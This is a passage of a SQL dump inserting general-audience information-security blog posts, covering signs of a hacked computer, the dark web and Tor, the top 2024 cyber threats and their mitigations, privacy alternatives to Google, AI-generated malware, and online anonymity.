recent scans and ensure that real-time protection is active.</li>\r\n 	<li>Run a full system scan.</li>\r\n</ol>\r\n</li>\r\n</ul>\r\nIf you notice your antivirus turning off automatically or being unresponsive, this could indicate malware. Consider using a second-opinion scanner, like <strong>Malwarebytes</strong> or <strong>HitmanPro</strong>, for an additional layer of security.\r\n<h3>10. <strong>Perform a System Backup and Secure Sensitive Data</strong></h3>\r\nIf you detect signs of compromise, consider backing up your files before taking further action to protect your data. In severe cases, a full system reinstallation may be the most effective way to eliminate malware and start fresh.\r\n<ul>\r\n 	<li><strong>Backup Tips</strong>:\r\n<ul>\r\n 	<li>Use an external drive or a secure cloud storage provider.</li>\r\n 	<li>Disconnect the backup drive from the system after transferring data to prevent malware from spreading to the backup.</li>\r\n</ul>\r\n</li>\r\n</ul>\r\nRegular backups are a preventive measure that ensures you can restore your data in case of a severe attack.', '', NULL, NULL, 1, 'draft', '2024-11-09 20:22:55', '2026-01-12 21:41:44', 'Information Security', 'How to Tell if Your Computer Has Been Hacked: A Practical Guide with Tools', '', NULL),
(101, 'Dark Web and How It Works', 'dark-web-and-how-it-works', 'The internet is vast and complex, with many layers that most everyday users never see. While we\'re familiar with websites we can easily access through search engines like Google, there\'s a hidden part of the internet known as the dark web. Let\'s explore what the dark web is and how it works, in terms that anyone can understand.\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">What is the Dark Web?</h3>\r\nThe dark web is a part of the internet that is intentionally hidden and cannot be accessed through regular web browsers or search engines. It\'s a small portion of what\'s called the \"deep web,\" which is all the content on the internet that isn\'t indexed by search engines <span class=\"whitespace-nowrap\">.</span>To visualize this, imagine the internet as an iceberg:\r\n<ul class=\"marker:text-textOff list-disc pl-8\">\r\n 	<li>The tip of the iceberg, visible above water, represents the \"surface web\" - the websites we use every day.</li>\r\n 	<li>The part of the iceberg just below the water\'s surface is the \"deep web\" - content that requires logins or passwords, like your email or online banking.</li>\r\n 	<li>The very bottom of the iceberg, deep underwater, is the \"dark web\" - a hidden part of the internet that requires special software to access.</li>\r\n</ul>\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">How Does the Dark Web Work?</h3>\r\nThe dark web operates on overlay networks called \"darkness\" These networks sit on top of the regular internet but require specific software, configurations, or authorization to access. The most common software used to access the dark web is called Tor (The Onion Router)\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">The Onion Router (Tor)</h3>\r\nTor is a special web browser that allows you to access the dark web It\'s called \"The Onion Router\" because it uses a technique called \"onion routing\" to protect users\' privacy:\r\n<ol class=\"marker:text-textOff list-decimal pl-8\">\r\n 	<li>When you use Tor, your internet traffic is encrypted and sent through a series of computers around the world, called \"nodes\" or \"relays\"</li>\r\n 	<li>Each node only knows the location of the immediately preceding and following nodes.</li>\r\n 	<li>This process is like peeling layers of an onion, hence the name.</li>\r\n</ol>\r\nThis method makes it extremely difficult for anyone to trace the origin or destination of the information, providing anonymity to users\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Why Do People Use the Dark Web?</h3>\r\nThe dark web has both legitimate and illegal uses:\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Legitimate Uses:</h3>\r\n<ol class=\"marker:text-textOff list-decimal pl-8\">\r\n 	<li>Privacy and anonymity for people in countries with oppressive governments</li>\r\n 	<li>Secure communication for journalists, activists, and whistleblowers</li>\r\n 	<li>Some organizations, like newspapers and even government agencies, have dark websites to allow anonymous information sharing</li>\r\n</ol>\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Illegal Uses:</h3>\r\n<ol class=\"marker:text-textOff list-decimal pl-8\">\r\n 	<li>Buying and selling illegal goods and services, such as drugs, weapons, and stolen data</li>\r\n 	<li>Sharing illegal content</li>\r\n 	<li>Coordinating criminal activities</li>\r\n</ol>\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Accessing the Dark Web</h3>\r\nWhile it\'s not illegal to access the dark web, it\'s important to understand the risks:\r\n<ol class=\"marker:text-textOff list-decimal pl-8\">\r\n 	<li>You need special software, typically the Tor browser</li>\r\n 	<li>Websites on the dark web have addresses that end in \".onion\" instead of \".com\" or \".org\"</li>\r\n 	<li>It\'s much slower than regular internet browsing due to the multiple layers of encryption</li>\r\n</ol>\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Staying Safe</h3>\r\nIf you decide to explore the dark web, keep these safety tips in mind:\r\n<ol class=\"marker:text-textOff list-decimal pl-8\">\r\n 	<li>Use a VPN for added security</li>\r\n 	<li>Never share personal information.</li>\r\n 	<li>Be aware that many scams and dangerous content exist on the dark web</li>\r\n 	<li>Remember that despite the anonymity, law enforcement agencies actively work to combat illegal activities on the dark web</li>\r\n</ol>\r\nThe dark web is a hidden part of the internet that offers anonymity and privacy. While it has legitimate uses, it\'s also associated with illegal activities. Understanding how it works can help you navigate the internet more safely and make informed decisions about your online activities.Remember, for most people, there\'s rarely a need to access the dark web. The surface web provides ample resources for everyday internet use, and it\'s generally much safer and easier to navigate.', '', NULL, NULL, 1, 'draft', '2024-10-26 18:33:37', '2026-01-12 21:41:44', 'Information Security', 'Dark Web and How It Works', '', NULL),
(102, 'Top 10 Cybersecurity Threats in 2024 and How to Mitigate Them', 'top-10-cybersecurity-threats-in-2024-and-how-to-mitigate-them', 'As we progress through 2024, the cybersecurity landscape is evolving rapidly, with new threats emerging and old ones becoming more sophisticated. Cybercriminals are continuously innovating, and organizations and individuals alike must stay vigilant. Here are the <strong>Top 10 Cybersecurity Threats</strong> you should be aware of in 2024, along with vulnerabilities and strategies to mitigate them.\r\n<h4>1. <strong>AI-Powered Phishing Attacks</strong></h4>\r\n<strong><img class=\"size-medium wp-image-3427 alignleft\" src=\"https://infoseclabs.io/wp-content/uploads/2024/09/dangers-of-ai-malware-300x195.jpg\" alt=\"\" width=\"300\" height=\"195\" />Threat:</strong>\r\nPhishing has always been a prominent attack vector, but in 2024, cybercriminals are leveraging AI to craft hyper-realistic phishing emails that are harder to detect. AI can study an organization’s internal communications, mimic writing styles, and create phishing messages that appear legitimate.\r\n\r\n<strong>Vulnerability:</strong>\r\nThe human factor remains the primary weakness. Employees are often the targets, as they can be easily deceived by convincing, AI-generated phishing emails.\r\n\r\n<strong>Mitigation:</strong>\r\n<ul>\r\n 	<li><strong>Security Awareness Training:</strong> Continuous phishing simulations and training help employees recognize phishing attempts.</li>\r\n 	<li><strong>Advanced Email Filtering:</strong> Use AI-based email filters that can detect subtle patterns of phishing attempts.</li>\r\n 	<li><strong>Multi-Factor Authentication (MFA):</strong> Implement MFA to prevent unauthorized access, even if credentials are compromised.</li>\r\n</ul>\r\n<h4>2. <strong>Deepfake Cyber Attacks</strong></h4>\r\n<strong><img class=\"size-medium wp-image-3451 alignleft\" src=\"https://infoseclabs.io/wp-content/uploads/2024/10/deepfake_ai-300x171.jpeg\" alt=\"\" width=\"300\" height=\"171\" />Threat:</strong>\r\nDeepfake technology is improving rapidly, allowing attackers to create fake audio and video that appear real. In 2024, we see deepfakes being used for fraud, impersonation, and disinformation campaigns.\r\n\r\n<strong>Vulnerability:</strong>\r\nTrust in digital media and communications is being exploited. Businesses could be tricked into financial scams where deepfakes of CEOs or executives issue fraudulent directives.\r\n\r\n<strong>Mitigation:</strong>\r\n<ul>\r\n 	<li><strong>Deepfake Detection Tools:</strong> Use AI-based solutions that can analyze audio and video files to identify manipulation.</li>\r\n 	<li><strong>Verification Protocols:</strong> Always verify sensitive communications through secondary channels like phone calls or secure messaging apps.</li>\r\n 	<li><strong>Employee Awareness:</strong> Train employees to be skeptical of video and audio communications that seem out of character.</li>\r\n</ul>\r\n<h4>3. <strong>Ransomware 3.0</strong></h4>\r\n<strong><img class=\"size-medium wp-image-2972 alignleft\" src=\"https://infoseclabs.io/wp-content/uploads/2024/07/ransomware-300x225.jpeg\" alt=\"\" width=\"300\" height=\"225\" />Threat:</strong>\r\nRansomware continues to evolve, with attackers now not only encrypting data but also threatening to release sensitive data if their demands aren’t met. This form of double extortion is growing, with attackers increasing pressure on victims by exposing breaches publicly.\r\n\r\n<strong>Vulnerability:</strong>\r\nPoorly secured networks, inadequate data backups, and a lack of encryption make organizations vulnerable to ransomware attacks.\r\n\r\n<strong>Mitigation:</strong>\r\n<ul>\r\n 	<li><strong>Regular Backups:</strong> Maintain up-to-date offline backups of critical data.</li>\r\n 	<li><strong>Endpoint Detection &amp; Response (EDR):</strong> Use EDR tools to monitor and detect abnormal activities.</li>\r\n 	<li><strong>Network Segmentation:</strong> Segment your network to prevent the lateral spread of ransomware once it penetrates one part of the system.</li>\r\n</ul>\r\n<h4>4. <strong>Supply Chain Attacks</strong></h4>\r\n<strong>Threat:</strong>\r\nAttackers target weak links in the supply chain to infiltrate larger organizations. They exploit vulnerabilities in third-party software, hardware, or service providers to gain access to secure networks.\r\n\r\n<strong>Vulnerability:</strong>\r\nThird-party vendors often don’t adhere to the same security standards, and businesses might not have visibility into their partners’ security practices.\r\n\r\n<strong>Mitigation:</strong>\r\n<ul>\r\n 	<li><strong>Vendor Risk Management:</strong> Regularly assess and monitor the security posture of all third-party vendors.</li>\r\n 	<li><strong>Zero Trust Architecture:</strong> Implement zero trust principles where no entity, inside or outside the network, is trusted by default.</li>\r\n 	<li><strong>Contractual Security Clauses:</strong> Ensure that contracts with third parties include stringent security requirements and liability clauses.</li>\r\n</ul>\r\n<h4>5. <strong>Cloud Misconfigurations</strong></h4>\r\n<strong>Threat:</strong>\r\nWith the rapid adoption of cloud services, improper configuration of cloud resources remains a significant threat. Misconfigurations can expose sensitive data, making it easily accessible to attackers.\r\n\r\n<strong>Vulnerability:</strong>\r\nDefault security settings, improper access control, and insufficient monitoring often leave cloud environments vulnerable to exploitation.\r\n\r\n<strong>Mitigation:</strong>\r\n<ul>\r\n 	<li><strong>Continuous Monitoring:</strong> Use cloud security posture management (CSPM) tools to continuously audit configurations.</li>\r\n 	<li><strong>Least Privilege Principle:</strong> Ensure that users only have access to the cloud resources necessary for their role.</li>\r\n 	<li><strong>Regular Audits:</strong> Conduct regular security audits of cloud environments to ensure compliance with security policies.</li>\r\n</ul>\r\n<h4>6. <strong>IoT-Based Attacks</strong></h4>\r\n<strong>Threat:</strong>\r\nThe proliferation of Internet of Things (IoT) devices in industries, homes, and public spaces creates numerous entry points for cybercriminals. Many IoT devices lack sufficient security features, making them prime targets for exploitation.\r\n\r\n<strong>Vulnerability:</strong>\r\nWeak or default passwords, outdated firmware, and limited security capabilities make IoT devices vulnerable to attacks, especially DDoS and botnet attacks.\r\n\r\n<strong>Mitigation:</strong>\r\n<ul>\r\n 	<li><strong>Strong Authentication:</strong> Use strong, unique passwords for IoT devices and enable two-factor authentication where possible.</li>\r\n 	<li><strong>Firmware Updates:</strong> Regularly update firmware to patch known vulnerabilities.</li>\r\n 	<li><strong>Network Isolation:</strong> Isolate IoT devices on a separate network to limit exposure in case of compromise.</li>\r\n</ul>\r\n<h4>7. <strong>Insider Threats</strong></h4>\r\n<strong>Threat:</strong>\r\nIn 2024, insider threats are becoming more sophisticated, with employees, contractors, or partners intentionally or unintentionally causing harm. Whether driven by financial gain, disgruntlement, or carelessness, insider threats can be harder to detect than external attacks.\r\n\r\n<strong>Vulnerability:</strong>\r\nOrganizations with weak monitoring, excessive permissions, or poor employee oversight are particularly vulnerable to insider threats.\r\n\r\n<strong>Mitigation:</strong>\r\n<ul>\r\n 	<li><strong>User Behavior Analytics (UBA):</strong> Use AI-powered tools to monitor employee behavior and detect anomalies.</li>\r\n 	<li><strong>Least Privilege Access:</strong> Limit employees\' access to only the resources they need to perform their jobs.</li>\r\n 	<li><strong>Whistleblower Programs:</strong> Create internal reporting mechanisms to detect potential insider threats before they escalate.</li>\r\n</ul>\r\n<h4>8. <strong>Quantum Computing Threats</strong></h4>\r\n<strong>Threat:</strong>\r\nQuantum computing, while still in its early stages, has the potential to break traditional cryptographic algorithms. In 2024, this threat is not yet fully realized but is a growing concern for future-proofing data security.\r\n\r\n<strong>Vulnerability:</strong>\r\nAny system relying on traditional encryption methods (such as RSA and ECC) is vulnerable to being compromised once quantum computers become capable of breaking these algorithms.\r\n\r\n<strong>Mitigation:</strong>\r\n<ul>\r\n 	<li><strong>Post-Quantum Cryptography:</strong> Start exploring quantum-resistant encryption algorithms.</li>\r\n 	<li><strong>Data Prioritization:</strong> Protect the most sensitive and long-term data with the highest encryption standards.</li>\r\n 	<li><strong>Stay Informed:</strong> Keep abreast of developments in quantum computing and cryptography to prepare for upcoming challenges.</li>\r\n</ul>\r\n<h4>9. <strong>API Security Vulnerabilities</strong></h4>\r\n<strong>Threat:</strong>\r\nAs more applications rely on APIs to communicate with each other, APIs become an attractive target for attackers. Insecure APIs can lead to data breaches, denial of service, or unauthorized access.\r\n\r\n<strong>Vulnerability:</strong>\r\nUnsecured APIs, weak authentication mechanisms, and improper rate limiting can expose APIs to exploitation.\r\n\r\n<strong>Mitigation:</strong>\r\n<ul>\r\n 	<li><strong>API Gateway Security:</strong> Use an API gateway to enforce authentication, rate limiting, and traffic monitoring.</li>\r\n 	<li><strong>Input Validation:</strong> Ensure that all inputs to the API are properly validated to prevent injection attacks.</li>\r\n 	<li><strong>Access Control:</strong> Implement strict access control policies for APIs to limit who can access specific endpoints.</li>\r\n</ul>\r\n<h4>10. <strong>Zero-Day Exploits</strong></h4>\r\n<strong>Threat:</strong>\r\nZero-day exploits are vulnerabilities that are unknown to software vendors and are actively exploited by attackers before a patch is available. In 2024, attackers are becoming more adept at discovering and weaponizing these vulnerabilities.\r\n\r\n<strong>Vulnerability:</strong>\r\nSoftware that is not frequently updated or monitored is at high risk of zero-day exploits, leaving organizations exposed until patches are released.\r\n\r\n<strong>Mitigation:</strong>\r\n<ul>\r\n 	<li><strong>Patch Management:</strong> Ensure that software and systems are regularly updated with the latest security patches.</li>\r\n 	<li><strong>Threat Intelligence:</strong> Use threat intelligence services to stay informed about potential zero-day vulnerabilities in your software stack.</li>\r\n 	<li><strong>Endpoint Protection:</strong> Deploy advanced endpoint protection solutions that can detect and block exploit attempts, even for unknown vulnerabilities.</li>\r\n</ul>\r\n<h3></h3>\r\n2024 presents new challenges in cybersecurity as attackers become more innovative and sophisticated. Organizations can significantly reduce their risk by understanding the top threats and implementing robust mitigation strategies. Whether it\'s using advanced security tools, continuously training employees, or adopting new technologies like post-quantum cryptography, staying one step ahead of attackers is key to securing your digital future.\r\n\r\nStay vigilant, and always be proactive in your approach to cybersecurity.', '', NULL, NULL, 1, 'draft', '2024-10-20 15:36:21', '2026-01-12 21:41:44', 'Information Security', 'Top 10 Cybersecurity Threats in 2024 and How to Mitigate Them', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(103, 'Consider Removing Google from Your Life for Privacy', 'consider-removing-google-from-your-life', 'Google has become so embedded in our daily lives that the mere thought of removing it can seem daunting. Whether it\'s for searching information, browsing the web, or using their cloud services, Google has positioned itself as an integral part of how we navigate the digital world. But have you ever wondered why they can offer all these top-tier services for free or at prices competitors can’t match? The answer lies in how they handle your data.\r\n<h3>The Price You Pay: Your Data</h3>\r\nGoogle’s business model heavily relies on collecting and selling user data. By analyzing your behavior, Google can predict your next move, offering you products and services that seem incredibly convenient. However, this convenience comes at a cost—your privacy.\r\n\r\nSome may argue that they don’t mind giving up some data in exchange for free services, but the scale of data collection is enormous. When your data is combined with that of millions of users, companies like Google can manipulate perceptions, impacting how entire societies think and behave. The Cambridge Analytica scandal is a prime example of how such data can be misused.\r\n\r\nWhile completely removing Google from your life might be challenging, it’s possible to reduce your dependence on their services. In this post, we’ll look at alternatives to Google services and how you can regain control of your digital privacy.\r\n<h3>1. Search Engines: Stepping Away from Google Search</h3>\r\nOne of Google’s most significant products is its search engine, but even here, there are reasons to look for alternatives. Google search results are filled with ads, and organic results are often buried beneath them. Google has transitioned from being a search engine to a service designed to keep you within their ecosystem.\r\n\r\nFortunately, several privacy-focused alternatives offer similar functionality without tracking your every move:\r\n<ul>\r\n 	<li><strong><a href=\"https://www.startpage.com/\" target=\"_new\" rel=\"noopener\">Startpage</a></strong> and <strong><a href=\"https://www.ecosia.org/\" target=\"_new\" rel=\"noopener\">Ecosia</a></strong>: These search engines provide Google’s results but without tracking users. While they do display ads, they aren’t personalized based on your search history.</li>\r\n 	<li><strong><a href=\"https://duckduckgo.com/\" target=\"_new\" rel=\"noopener\">DuckDuckGo</a></strong>: Known for its privacy features, DuckDuckGo doesn’t track users and offers additional features like the ability to search other sites easily with its exclamation mark feature (!bang).</li>\r\n 	<li><strong><a target=\"_new\" rel=\"noopener\">Brave Search</a></strong>: Brave\'s search engine comes with a built-in ad blocker and other privacy features, though it does collect anonymous usage data unless you turn it off.</li>\r\n 	<li><strong><a href=\"https://kagi.com/\" target=\"_new\" rel=\"noopener\">Kagi</a></strong>: For those willing to pay for a search engine, Kagi offers a premium, ad-free search experience with added features like an AI assistant and customizable search results.</li>\r\n</ul>\r\nEach of these alternatives allows you to change your default search engine easily through your browser’s settings.\r\n<h3>\r\n2. Browsers: Moving Beyond Google Chrome</h3>\r\nGoogle Chrome is another widely used product, but like the search engine, it’s designed to collect data. While many alternatives use Google’s Chromium engine, which gives Google a hold on the browser market, you still have privacy-focused options.\r\n<ul>\r\n 	<li><strong><a href=\"https://librewolf.net/\" target=\"_new\" rel=\"noopener\">LibreWolf</a></strong>: This Firefox-based browser prioritizes privacy and security. If you value these, LibreWolf should be your go-to. Just make sure to turn off the “delete all cookies” option if you don’t want to be logged out of sites every time you close the browser.</li>\r\n 	<li><strong><a href=\"https://brave.com/\" target=\"_new\" rel=\"noopener\">Brave Browser</a></strong>: Another Chromium-based browser, Brave blocks ads and trackers by default. However, it does come with features like Brave Wallet and Brave BAT, which you’ll need to disable manually if you don’t want them.</li>\r\n 	<li><strong><a target=\"_new\" rel=\"noopener\">Ungoogled Chromium</a></strong>: As the name suggests, this is a Chromium-based browser stripped of all Google services. While you’ll lose features like synchronization, you gain full control over your data.</li>\r\n</ul>\r\nIf you’re switching from Chrome, the migration process is relatively simple. For Firefox-based browsers, you’ll need to export and import bookmarks, history, and add-ons manually. For Chromium-based browsers, just copy the “User Data” folder to the new browser\'s directory.\r\n<h3>3. Email: Secure Your Communications</h3>\r\nIf you use Gmail, your emails are subject to data collection. Fortunately, there are secure alternatives that protect your privacy with end-to-end encryption:\r\n<ul>\r\n 	<li><strong><a target=\"_new\" rel=\"noopener\">ProtonMail</a></strong>: This popular email service encrypts your emails so that even ProtonMail can’t access them. It offers 1 GB of free storage, which is enough for many users, though paid plans are available.</li>\r\n 	<li><strong><a href=\"https://tutanota.com/\" target=\"_new\" rel=\"noopener\">Tutanota</a></strong>: Similar to ProtonMail, Tutanota provides encrypted email services with a free 1 GB storage option and premium plans for more storage.</li>\r\n</ul>\r\nBoth services ensure that your data remains private and inaccessible to third parties. While you could also host your own mail server with software like <strong><a href=\"https://mailcow.email/\" target=\"_new\" rel=\"noopener\">Mailcow</a></strong>, this requires more technical expertise.\r\n<h3>4. Cloud Storage: Replacing Google Drive</h3>\r\nGoogle Drive is one of the most affordable cloud storage solutions, but there are alternatives that offer greater privacy:\r\n<ul>\r\n 	<li><strong><a target=\"_new\" rel=\"noopener\">Proton Drive</a></strong>: This service offers end-to-end encryption, ensuring that your files remain private. However, it can be more expensive than Google Drive.</li>\r\n 	<li><strong><a href=\"https://cryptomator.org/\" target=\"_new\" rel=\"noopener\">CryptoMator</a></strong>: If you want to keep using Google Drive but ensure your files are secure, you can use CryptoMator. It encrypts files on your device before uploading them, preventing Google from accessing your data.</li>\r\n</ul>\r\n<h3>5. Maps: Finding Alternatives to Google Maps</h3>\r\nGoogle Maps is one of the hardest services to replace due to its functionality and up-to-date data. However, <strong><a href=\"https://organicmaps.app/\" target=\"_new\" rel=\"noopener\">Organic Maps</a></strong>, which is based on OpenStreetMap, is a good alternative for those prioritizing privacy.\r\n<h3>6. Password Managers: Ditching Google Password Manager</h3>\r\nIf you rely on Google Password Manager, your accounts could be at risk if your Google account is compromised. Consider these alternatives:\r\n<ul>\r\n 	<li><strong><a href=\"https://bitwarden.com/\" target=\"_new\" rel=\"noopener\">Bitwarden</a></strong>: An open-source, end-to-end encrypted password manager that syncs across devices.</li>\r\n 	<li><strong><a href=\"https://keepassxc.org/\" target=\"_new\" rel=\"noopener\">KeePassXC</a></strong>: A local password manager that keeps your passwords offline. For syncing across devices, you’ll need to use third-party solutions like Dropbox or SyncThing.</li>\r\n</ul>\r\n<h3>7. Two-Factor Authentication: Moving Away from Google Authenticator</h3>\r\nWhile Google Authenticator is popular, it doesn’t allow you to export your keys easily. Instead, you can try:\r\n<ul>\r\n 	<li><strong><a target=\"_new\" rel=\"noopener\">Ente Auth</a></strong>: An open-source, cross-platform alternative that gives you more control over your 2FA keys.</li>\r\n</ul>\r\n<h3></h3>\r\nWhile Google offers powerful and convenient services, the cost is often your privacy. By gradually moving away from Google’s ecosystem and adopting privacy-first alternatives, you can regain control over your data without sacrificing functionality.', '', NULL, NULL, 1, 'draft', '2024-10-05 13:50:34', '2026-01-12 21:41:44', 'Information Security', 'Consider Removing Google from Your Life for Privacy', '', NULL),
(104, 'AI-Generated Malware: The New Cyber Threat Everyone Should Know About', 'ai-generated-malware-the-new-cyber-threat', 'Imagine a world where the viruses attacking your computer aren\'t crafted by hackers but by machines. It sounds like something out of a sci-fi movie, but it’s happening today. Artificial intelligence (AI) is now being used to create malware—those harmful programs that can steal your personal information or mess up your system. And here’s the really unsettling part: these AI-powered threats are already out in the wild, affecting people and businesses alike.\r\n<h3>What Is AI-Generated Malware?</h3>\r\nTraditionally, malware—like viruses, spyware, and ransomware—has been created by skilled hackers who knew how to write complex code. But today, AI is making it easier for even less tech-savvy individuals to create sophisticated malware. AI has the ability to write code faster, smarter, and more accurately than a human. This means that malware can be created in a fraction of the time it used to take, and it\'s often more effective.\r\n\r\nFor example, a recent discovery by cybersecurity experts uncovered an email campaign targeting people in France. This was no ordinary phishing attempt (the kind of email that tries to trick you into giving away personal information). The malware attached to these emails appeared to be generated by AI. What made it stand out was how well-crafted the malicious code was—perfectly written and even “commented” throughout. In coding, comments are used to explain what each part of the code does, and while humans often skip this step, AI did it flawlessly. This precision makes AI-generated malware even more dangerous.\r\n<h3>How AI Is Changing the Game for Cybercriminals</h3>\r\nBefore the rise of AI in cybercrime, creating a piece of malware required a deep understanding of computer systems and coding. It was a job for highly skilled hackers. Now, AI has lowered that barrier. Even someone with basic knowledge of programming can use AI tools to generate malware. This means we’re not just dealing with elite hackers anymore. We’re potentially facing a flood of low-level attackers who can still do a lot of damage, thanks to AI.\r\n\r\nA recent case from June 2024 highlights how AI-generated malware is already being used in the real world. In a phishing campaign, users were sent password-protected zip files via email. Once the files were opened, they released malicious code written in VBScript and JavaScript, two types of programming languages. This malware was designed to infect the computer by secretly changing system settings and staying hidden so that even antivirus programs wouldn’t catch it. AI helped create this code, making it more persistent and sneaky than usual.\r\n\r\nAccording to HP Wolf Security’s Q2 2024 report, there’s a disturbing trend: AI is now helping even inexperienced hackers create malware faster than ever before. AI can write code that works across different types of operating systems, such as Windows, Mac, and Linux. It can also help attackers customize their attacks based on the specific system they’re targeting, making it even more difficult to defend against.\r\n<h3>Why Should You Care?</h3>\r\nYou might be wondering why this matters to you. After all, most people assume cyberattacks are something that happens to big companies or government organizations, not to everyday individuals. But that’s no longer the case. AI is making it easier for cybercriminals to cast a wider net, meaning more people are at risk of falling victim to malware.\r\n\r\nFor example, AI can generate more convincing phishing emails that look like they’re coming from your bank, your workplace, or even a friend. Because the malware created by AI can be more complex, it can evade the typical security measures that would usually stop less sophisticated threats. In other words, the same antivirus program that protected you last year might not be enough to defend against today’s AI-powered malware.\r\n\r\nAnother reason to be concerned is the speed at which these threats are evolving. Since AI can generate and improve code so quickly, the traditional methods of catching and stopping malware are struggling to keep up. This rapid development means that your personal data, your financial information, and even your devices are at greater risk.\r\n<h3>How to Protect Yourself</h3>\r\nSo, what can you do? The good news is that while AI is making malware more dangerous, there are still steps you can take to protect yourself and your devices. Here are a few practical tips:\r\n<ol>\r\n 	<li><strong>Keep Your Software Up to Date</strong>: One of the simplest ways to protect yourself is to regularly update your operating system and software. These updates often include security patches that protect against the latest threats. Many AI-generated malware attacks exploit vulnerabilities in outdated software, so staying up to date is your first line of defense.</li>\r\n 	<li><strong>Be Cautious with Emails and Attachments</strong>: Since phishing attacks are a common way AI-generated malware is spread, be extra cautious with any emails that seem suspicious. Don’t open attachments from unknown senders, and be wary of emails that ask for personal information or have unusual requests.</li>\r\n 	<li><strong>Use Strong, Unique Passwords</strong>: Weak or reused passwords are an easy target for cybercriminals. Use a password manager to generate and store complex, unique passwords for each of your accounts.</li>\r\n 	<li><strong>Enable Two-Factor Authentication (2FA)</strong>: Adding an extra layer of security to your accounts with 2FA makes it harder for attackers to gain access, even if they manage to steal your password.</li>\r\n 	<li><strong>Stay Informed</strong>: The world of cybersecurity is constantly evolving, and so are the threats. By staying informed about the latest trends, like AI-generated malware, you’ll be better prepared to defend yourself. Follow trustworthy tech news sources and consider subscribing to cybersecurity updates.</li>\r\n</ol>\r\n<h3>The Future of Cybersecurity</h3>\r\nAs AI continues to develop, so will the threats we face. Cybersecurity experts are working hard to come up with new defenses, but the reality is that AI is pushing the boundaries of what we’re used to. In the near future, we might see malware being created, deployed, and updated by AI without any human intervention at all.\r\n\r\nFor now, the best thing we can do is to stay informed and proactive about our online security. AI-generated malware may sound like a problem for tech experts to solve, but it affects all of us. The more we understand these new threats, the better prepared we’ll be to protect ourselves, our families, and our devices.\r\n\r\nAI-generated malware is already here, and it’s changing the way we think about cybersecurity. With AI helping even low-level attackers create more dangerous and sophisticated malware, the risk to everyday users has increased significantly. But by staying informed, cautious, and proactive, we can defend ourselves against these new threats.\r\n\r\n&nbsp;', '', NULL, NULL, 1, 'draft', '2024-09-30 00:34:34', '2026-01-12 21:41:44', 'Information Security', 'AI-Generated Malware: The New Cyber Threat Everyone Should Know About', '', NULL),
(105, 'How to Stay Anonymous Online: A Beginner\'s Guide to Protecting Your Privacy', 'how-to-stay-anonymous-online-a-beginners-guide-to-protecting-your-privacy', 'The idea of staying anonymous online has become more important than ever. You might think it’s easy to hide your identity on the internet, but it’s actually more complicated than most people believe. Whether you’re trying to protect your privacy or simply reduce your online presence, here’s a beginner-friendly guide to help you stay anonymous on the internet.\r\n<h4><strong>What Does Being Anonymous Online Mean?</strong></h4>\r\nBeing anonymous online means limiting the amount of personal information you share, such as your name, email, location, or any other identifying details. While complete anonymity may be difficult to achieve, it’s possible to take steps that reduce your digital footprint and make it harder for others to track you.\r\n<h4><strong>Start With Limiting Personal Information</strong></h4>\r\nThe first and most important step to staying anonymous is to limit the personal information you share. Avoid using your real name, address, or contact details on social media profiles or websites. For example, create a different username that doesn’t link back to your real identity. You can use different personas or characters for different platforms to avoid being easily identified.\r\n\r\nFor instance, create a persona for Instagram and another for Twitter, with unique usernames that have no connection to each other or your real identity. This is the first layer of defense when it comes to being anonymous online.\r\n<h4><strong>Create Strong, Unique Passwords</strong></h4>\r\nPasswords are one of the biggest weak points when it comes to staying anonymous. If you use the same password across multiple accounts, it becomes easy for someone to trace those accounts back to you if one gets hacked. Always use strong, unique passwords for each of your online accounts.\r\n\r\nA good tip is to use a password manager to help you store and create complex passwords that are hard to crack. This way, you won’t have to remember them all, and it will significantly improve your anonymity.\r\n<h4><strong>Using VPNs for Anonymity</strong></h4>\r\nA VPN (Virtual Private Network) is a service that hides your real IP address and encrypts your internet connection, making it harder for anyone to track your online activity. However, be cautious when choosing a VPN service. While VPNs provide some privacy, they are not foolproof. Many VPN services can be forced to hand over data to law enforcement agencies if required.\r\n\r\nIt’s important to use a reliable VPN provider that doesn’t keep logs of your activities. Even so, remember that VPNs aren’t a perfect solution for staying anonymous online—it\'s just one tool in your privacy toolbox.\r\n<h4><strong>Exploring TOR for Enhanced Anonymity</strong></h4>\r\nIf you want to go a step further in hiding your online activity, you can use TOR (The Onion Router). TOR routes your internet connection through several servers around the world, making it extremely difficult to track your IP address. This is a popular tool for those seeking a higher level of anonymity, especially when accessing websites that value privacy.\r\n\r\nHowever, even TOR has its limitations. Law enforcement agencies have been known to set up fake servers, called nodes, to monitor traffic. While TOR is a useful tool, it’s not a guarantee for absolute privacy. It’s best to combine TOR with other privacy measures like VPNs for better protection.\r\n<h4><strong>Anonymous Email and Messaging</strong></h4>\r\nMany people make the mistake of using their personal email addresses for everything. But to remain anonymous, it’s essential to use anonymous email services. Gmail or Yahoo might seem convenient, but they are not built for privacy. Services like ProtonMail and Guerilla Mail are great alternatives because they don’t require personal information when signing up, and they encrypt your emails.\r\n\r\nSimilarly, for messaging, avoid apps like WhatsApp if you\'re looking for better privacy options. Instead, use secure messaging apps like Signal, which provide end-to-end encryption and don’t store your messages on their servers.\r\n<h4><strong>Be Cautious on Social Media</strong></h4>\r\nSocial media is one of the biggest pitfalls when it comes to anonymity. Even if you use a fake name, the posts, comments, and pictures you share can reveal a lot about your identity. Be mindful of what you post online, and never share sensitive or personal information that could be traced back to you.\r\n\r\nIf you’re serious about anonymity, consider using multiple social media accounts with different personas. Be careful about the photos you post, as they can contain metadata, such as the location where the picture was taken. To stay anonymous, strip the metadata from your images before uploading them.\r\n<h4><strong>Don’t Use Anonymity for Illegal Activities</strong></h4>\r\nOne key point to remember: anonymity is for protecting your privacy, not for illegal activities. Law enforcement agencies have advanced tools and techniques to uncover your real identity, even when you use tools like VPNs and TOR. Many people have been caught because they thought they were invisible online, only to be traced due to their mistakes.\r\n\r\nAnonymity helps you maintain privacy, but it doesn’t give you a free pass to break the law. The best way to stay 